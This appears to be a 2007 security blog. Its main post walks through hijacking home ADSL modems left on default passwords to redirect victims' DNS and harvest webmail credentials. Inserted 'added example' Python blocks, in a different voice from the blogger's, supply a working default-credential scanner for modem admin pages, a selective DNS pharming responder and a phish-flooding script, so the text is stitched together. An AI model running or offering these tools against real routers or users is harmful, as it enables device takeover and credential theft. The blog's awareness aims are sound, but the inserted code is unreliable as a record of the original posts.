Thursday, July 19, 2007

Pharming exposed

While many people know and understand phishing, pharming as a threat does not seem to have caught the popular imagination. In this article I attempt to show how ignorance, or perhaps simple oversight, can lead to a complete compromise of your system, ending with it becoming part of a botnet remotely controlled by an attacker.
There are many variants of pharming. In this article I demonstrate one that a beginner- to moderate-level attacker can pull off easily.
The attack leverages the fact that most ADSL modems run an HTTP server for configuration, and that this server is frequently reachable on the modem's public (WAN) address and protected only by the factory-default user id and password.
Most of the time, a technician from the phone company comes and installs the ADSL modem, and the user is all set. What they do not tell you is that you need to change the default password on your ADSL modem immediately. To drive home the point, I thought it better to put on my bad-guy hat and get to work. Please note that no actual break-in was attempted on any of the systems, and that the information is provided for educational purposes only.


Assumptions:
You know how to set up a DNS server and an HTTP server, and have your computer reachable from the internet (if you are behind an ADSL router yourself, you will need to put your own system in the DMZ and open up your firewall).
You know how to set up a gateway and enable IP forwarding on it.

Step 1: Reconnaissance
The first step is of course a reconnaissance attempt to find potential victims. I run a quick check for the world-visible IP address my router has. I am lazy, so I simply visit showmyip.com. It shows me xxx.xxx.191.16.
Not surprisingly, I am in my ISP's address block. I just take a small sample of 255 systems in my vicinity, whose IPs would be in the range xxx.xxx.191.1 to xxx.xxx.191.255.

Now I need to find out which DSL modems in this range still have the default password.

I know that my ISP uses Beetel, D-Link and Huawei modems, which generally have admin as the user id and one of 1234, password, admin or utstar as the password. So, I write a program (using libcurl) which spawns 30 threads and tries each IP in the range with the default id and passwords. A scan of the 255 addresses takes me 3 minutes and shows me 14 open DSL modems.
The systems that return HTTP response code 200 accept the default id and password (see figure below).


Here is a screenshot of my system discovery code (he he he, the actual code that does the recon is not shown).



Code screenshot

If you have a dedicated system and unlimited data transfer, you can probably run this the whole day and scan thousands of IP addresses.
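The sweep described in Step 1, written out as an added example (it is not the author's libcurl program, which was withheld). It assumes the modems protect their configuration page with HTTP Basic auth on the root URL and that a 200 means the credentials were accepted; the probe function is injectable, so the logic can be exercised offline against a constructed set of fake hosts, and the address ranges below are documentation (TEST-NET) placeholders. Only point it at devices you are authorised to test.

```python
"""Default-credential sweep of ADSL modem admin interfaces (added example)."""
import base64
import ipaddress
import sys
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# Default id/password pairs named in the post for Beetel, D-Link and Huawei units.
DEFAULT_CREDS = [("admin", pw) for pw in ("admin", "1234", "password", "utstar")]


def basic_auth_status(host, user, pw, timeout=3):
    """GET http://host/ with Basic credentials; return the HTTP status,
    or None if nothing answered (no HTTP server, filtered, timeout)."""
    req = urllib.request.Request(f"http://{host}/")
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:  # 401/403 etc. still tell us a server is there
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def check_host(host, probe=basic_auth_status):
    """Try each default pair in turn; stop early if the host is not listening.
    Returns (host, (user, pw)) on a 200, else (host, None)."""
    for user, pw in DEFAULT_CREDS:
        status = probe(host, user, pw)
        if status is None:
            return host, None
        if status == 200:
            return host, (user, pw)
    return host, None


def hosts_in_range(cidr):
    """Usable host addresses of a CIDR block, as strings (e.g. a /24 gives .1-.254)."""
    return (str(ip) for ip in ipaddress.ip_network(cidr, strict=False).hosts())


def sweep(hosts, probe=basic_auth_status, workers=30):
    """Probe hosts concurrently (the post used 30 threads); map of host -> working creds."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: check_host(h, probe), hosts))
    return {host: creds for host, creds in results if creds}


if __name__ == "__main__":
    # Usage: python sweep.py 192.0.2.0/24   (placeholder range; use one you own)
    cidr = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.0/29"
    for host, (user, pw) in sweep(hosts_in_range(cidr)).items():
        print(f"{host}: default credentials accepted ({user}/{pw})")
```

One caveat a practitioner will want: some firmwares answer 200 with the login form for any credentials, so in practice confirm a hit by looking for a string that only appears on the real configuration page (the model's status page title, for instance) rather than trusting the status code alone.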

Step 2: Preparing for the attack:
Now I need to decide what I want to do with these open systems. There are just too many things one can do with this; I will explain the possibilities later. For now, let's just say I want to grab those users' email ids and passwords. For this, I set up my own DNS server and put in authoritative entries for gmail, hotmail, yahoo, whatever I fancy, pointing at a web server of mine. For all other domains, I simply forward the queries to my ISP's DNS, so everything else keeps working and the victim has no reason to suspect anything. This is how it will work.



Normal steady-state DSL in operation

Once I have set up my DNS server, I also need to put up a web server to serve those fake login pages.
So, the two major pieces of preparation here are:
1. Set up a DNS server
2. Set up a web server with a database at the backend to grab the user ids and passwords
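The DNS half of Step 2 in working code, added here as an example and not the author's setup: a responder that answers A queries for a short list of hijacked names with the attacker's web server address and hands every other query to an upstream resolver unchanged. The hijacked names, the placeholder web server address (203.0.113.5, a TEST-NET address) and the `forward` callable are assumptions; `forward` is injectable so the exchange can be run offline, and in a real deployment it would be a UDP send/receive to the ISP resolver. Only A records over UDP are handled, which is enough to show the wire-level exchange.

```python
"""Selective DNS responder: authoritative for hijacked names, forwarder for the rest (added example)."""
import ipaddress
import struct

# Names answered locally (assumption: attacker web server at a TEST-NET placeholder address).
HIJACKED = {
    "gmail.com": "203.0.113.5",
    "www.gmail.com": "203.0.113.5",
    "mail.yahoo.com": "203.0.113.5",
}


def encode_name(name):
    """Wire-format QNAME: length-prefixed labels, terminated by a zero byte."""
    out = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg, off):
    """Read a (possibly compressed) name at offset; return (name, offset after it)."""
    labels = []
    while True:
        ln = msg[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:  # compression pointer to an earlier copy of the name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(msg[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln


def build_query(txid, name, qtype=1):
    """Standard recursive query (flags 0x0100 = RD) for one question, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_question(msg):
    """Return (txid, name, qtype, qclass, offset past the question section)."""
    txid = struct.unpack("!H", msg[:2])[0]
    name, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, name, qtype, qclass, off + 4


def build_answer(query, ip, ttl=300):
    """Response with one A record; flags 0x8580 = QR, AA, RD, RA. Echoes the question
    and uses a pointer (0xC00C) back to it for the answer's owner name."""
    txid, _name, _qtype, _qclass, qend = parse_question(query)
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + query[12:qend] + rr


def handle_query(query, forward):
    """The pharming logic: lie about the names we care about, forward everything else."""
    _txid, name, qtype, qclass, _end = parse_question(query)
    if qtype == 1 and qclass == 1 and name.lower() in HIJACKED:
        return build_answer(query, HIJACKED[name.lower()])
    return forward(query)


def answer_ips(response):
    """A-record addresses in a response; what a victim (or an auditor) actually receives."""
    qd, an = struct.unpack("!HH", response[4:8])
    off = 12
    for _ in range(qd):
        _name, off = decode_name(response, off)
        off += 4
    ips = []
    for _ in range(an):
        _name, off = decode_name(response, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(str(ipaddress.IPv4Address(response[off:off + 4])))
        off += rdlen
    return ips


if __name__ == "__main__":
    # Constructed upstream: pretends the ISP resolver says 198.51.100.7 for everything.
    upstream = lambda q: build_answer(q, "198.51.100.7")
    for qname in ("www.gmail.com", "example.org"):
        print(qname, "->", answer_ips(handle_query(build_query(0x1234, qname), upstream)))
```

The same `answer_ips` helper is the core of the defensive check: resolve a handful of names through the resolver your modem hands out and through an independent one you trust, and treat a disagreement on a login-page hostname as something to investigate (allowing for the fact that large mail providers legitimately return different addresses from different vantage points).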

Step 3: The attack:
Though this step can be completely automated with scripts or C programs, I do it manually on one single system, just as an example:
The schematic of a DNS hijacking attack is shown below.




So I log in to this person's DSL modem and point his DNS to my DNS server. And would you believe it? That's all I need to do to grab this person's internet.
This works because the modem hands its DNS server address to every machine on the LAN (via DHCP, or by relaying their queries itself), so every name lookup from the whole household now arrives at my server and none of the victim's computers had to be touched. The defensive check is correspondingly simple: compare the DNS server address configured in your modem with the one your ISP actually assigns, and change the admin password so nobody else can set it for you.


Logging in to the victim's router


Altering the DNS address


So that was easy; you could harvest a ton of stuff this way. But this alone does not give you much beyond credentials for the sites you chose to impersonate. So what else can I try? Why not intercept ALL of his traffic? How? That's easy: set my system as his gateway and enable IP forwarding on it, so every packet he sends passes through me before reaching the internet.

But then I want his whole system, not just the traffic. OK, put his system in the router's DMZ, so every inbound connection is forwarded to it and he is out in the open. I let nmap take a shot at identifying what OS he is running, pull out a bunch of exploits and throw them at the system, and presto, I have his computer.

But what will I do with his computer? I will think about that later.

Tuesday, July 17, 2007

Identifying Phish

Today, I got a McAfee link which apparently is a phish-awareness quiz. So off I went, took the quiz, and got 7/10. Great. Now to the point: somehow, I never expected a security company to offer such lame ways of identifying phish.
If I were to identify phish, the easiest way is to just take a look at the address bar and check the site (yes, the phisher can put an image over the address bar, but that is easy to figure out). Another precaution is to beware of wrong SSL certificates: a login page that claims to be your bank but has no certificate, or one issued to a different name, is a give-away. These two prime measures seem to have been conveniently ignored.
Just have a look:

This is the original AOL phish page:



This is SiteAdvisor's explanation:


Bank of America Phish analysis offered by siteadvisor


Capital One Phish analysis


It's surprising how a security company promotes such crude means of identifying phish.
The sad part is that these guys seem to imply that a site with correct grammar and graphics is NOT a phish site. Imagine what such an inference does to the grandma class of users. This is unfortunate.

Thursday, July 12, 2007

PhishPhighting

Today, in one of the orkut (a social networking site) communities, I read a post on how a guy lost his gmail id on a phish site. He posted the phish URL and warned others to beware.

True, other than trying to steer clear of them, there is little one can do about a phish attack. Surely, there are tons of advice on how to guard against phish. What's more, security companies are making money out of identifying and flagging phish sites.

Now that makes me wonder... Is there no other way? It reminded me of the "don't get mad, get even" adage. Let's see how we can do that. Think: what does a phisher do with the information he gleans? He uses it, of course. From reading others' emails to emptying bank accounts, they do it all.

From a security perspective, however, there is no such thing as foolproof security; it's just a matter of making it more difficult for the bad guy. So, in our attempt to get even with the phisher, that's what we focus on: we try to make it difficult for him to use phished information. How? We flood the phisher with junk data, data that is trash, randomly or dictionary generated. Once we flood the phisher's database (or whatever backend he is using) with trash, it's like finding the proverbial needle in a haystack for the phisher. Imagine having one valid victim credential among ten thousand garbage credentials. The only way left for the phisher is to actually try each credential against the real site to find out whether it is genuine.

Later in the article I demonstrate how such a thing may be accomplished.

Surely, a more competent phisher will then deploy countermeasures to such flooding. He may implement tracking, sessions or, in extreme cases, captchas on his phish site. Maybe he will filter out the flooding IPs. We will think of a solution when they get there. Remember, I am talking about raising the bar, not about eliminating the problem. Still, it's not difficult to defeat such anti-antiphish countermeasures (captchas would be an exception, though).

Also, remember, I am not talking about protecting yourself from phishers; I am talking about making their life miserable enough to wean them away from it.


The inspiration for this comes from the hilarious 419eater.com

Now, as promised earlier, let's look at how one may accomplish this.

Before I do that, here are some of the tools, libraries and utilities I used: Paros, libcurl, perl, gcc, linux... Wow...

The phish site:



Then I fire up my favorite : Paros




Then I set my browser to use this proxy



And then I get victimized




Here is what the phish request looks like:



After trying this with various permutations and combinations of systems and credentials, I found that other than the credentials, everything else in the request remains the same every time I get phished. This means I am in luck: all I need to hose the phisher's inbox is to keep sending him garbage POST requests. Great. Now to some actual work.

Now there are many ways I can swamp this guy. I can do a quick-and-dirty command line (ah, isn't curl great!), write my own C code using libcurl, or do a plain and simple perl script that uses the libcurl binding.

I tried all three. But somehow, it doesn't seem to be a good idea to publish the code. I haven't actually hosed the guy yet; I am in an ethical dilemma. Gunning down someone, even if that person is a crook, is still a crime. Let me sleep over it.
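To make the two technical claims of this post concrete, the replay of a captured POST with only the credential fields changed, and the session/token countermeasure the author expects a better phisher to add, here is an added example that is not the author's unpublished code. It sends nothing over the network: the phish kit is a constructed in-memory stand-in, the captured request and its field names (`login`, `passwd`) are made up, and the single-use hidden `tok` field is an assumed form of the countermeasure. The point it demonstrates is that blind replay works only until the kit ties each submission to a freshly served form, after which the flooder must fetch the form before every post.

```python
"""Junk-credential flooding of a phish kit, with and without a per-form token (added example)."""
import random
import secrets
import string
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for the request captured in Paros: only the two credential
# fields vary between submissions, everything else is replayed verbatim.
CAPTURED_REQUEST = {"login": "victim@example.com", "passwd": "hunter2", "submit": "Sign in"}


def junk_credentials(rng):
    """One plausible-looking but random email/password pair."""
    user = "".join(rng.choices(string.ascii_lowercase, k=rng.randint(5, 10)))
    domain = rng.choice(["gmail.com", "yahoo.com", "hotmail.com"])
    passwd = "".join(rng.choices(string.ascii_letters + string.digits, k=rng.randint(6, 12)))
    return f"{user}@{domain}", passwd


def build_body(template, login, passwd):
    """Form-encoded POST body: the captured template with the credentials swapped."""
    fields = dict(template)
    fields["login"], fields["passwd"] = login, passwd
    return urlencode(fields)


class NaivePhishBackend:
    """Stand-in for a kit that accepts every POST and appends it to its harvest."""

    def __init__(self):
        self.harvest = []

    def get_form(self):
        # A plain HTML form: nothing hidden that needs to be replayed.
        return {}

    def post(self, body):
        self.harvest.append(parse_qs(body))
        return True


class TokenPhishBackend(NaivePhishBackend):
    """Same kit with the countermeasure the post anticipates: a single-use token
    embedded in each served form, so a replayed capture is rejected after one hit."""

    def __init__(self):
        super().__init__()
        self.issued = set()

    def get_form(self):
        tok = secrets.token_hex(8)
        self.issued.add(tok)
        return {"tok": tok}

    def post(self, body):
        fields = parse_qs(body)
        tok = fields.get("tok", [None])[0]
        if tok not in self.issued:
            return False
        self.issued.discard(tok)  # one submission per served form
        self.harvest.append(fields)
        return True


def flood(backend, count, refetch_form=False, seed=0):
    """Submit `count` junk credentials; return how many the kit accepted.
    refetch_form=False mimics a curl one-liner that replays the capture as-is;
    refetch_form=True fetches the form before every post, defeating the token."""
    rng = random.Random(seed)
    hidden = backend.get_form()
    accepted = 0
    for _ in range(count):
        if refetch_form:
            hidden = backend.get_form()
        login, passwd = junk_credentials(rng)
        if backend.post(build_body({**CAPTURED_REQUEST, **hidden}, login, passwd)):
            accepted += 1
    return accepted


if __name__ == "__main__":
    print("naive kit, blind replay:  ", flood(NaivePhishBackend(), 1000))
    print("token kit, blind replay:  ", flood(TokenPhishBackend(), 1000))
    print("token kit, refetch form:  ", flood(TokenPhishBackend(), 1000, refetch_form=True))
```

Against a real kit the form fetch and the POST are ordinary HTTP requests, and the only extra work the token buys the phisher is that the flooder now has to parse the hidden field out of each served page; a captcha is the step that actually breaks this loop, which is why the post singles it out.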

Monday, July 2, 2007

business emails on 3rd party webmail servers?

The other day, I heard about an individual whose company email account was not functioning. There had been some problems with her account. Instead of getting it fixed by contacting IT and the helpdesk, she started using her personal gmail id for business communications. Important and confidential information regarding the product she works on, code snippets and developer discussions are all a part of google's data centers now.
What bothers me is that this is not a one-off isolated case. There are probably countless other instances where people are sending out sensitive business information over 3rd party public email servers.
It's probably a matter of time before someone comes up with a proposal for harvesting and profiting from sensitive data on email data centers.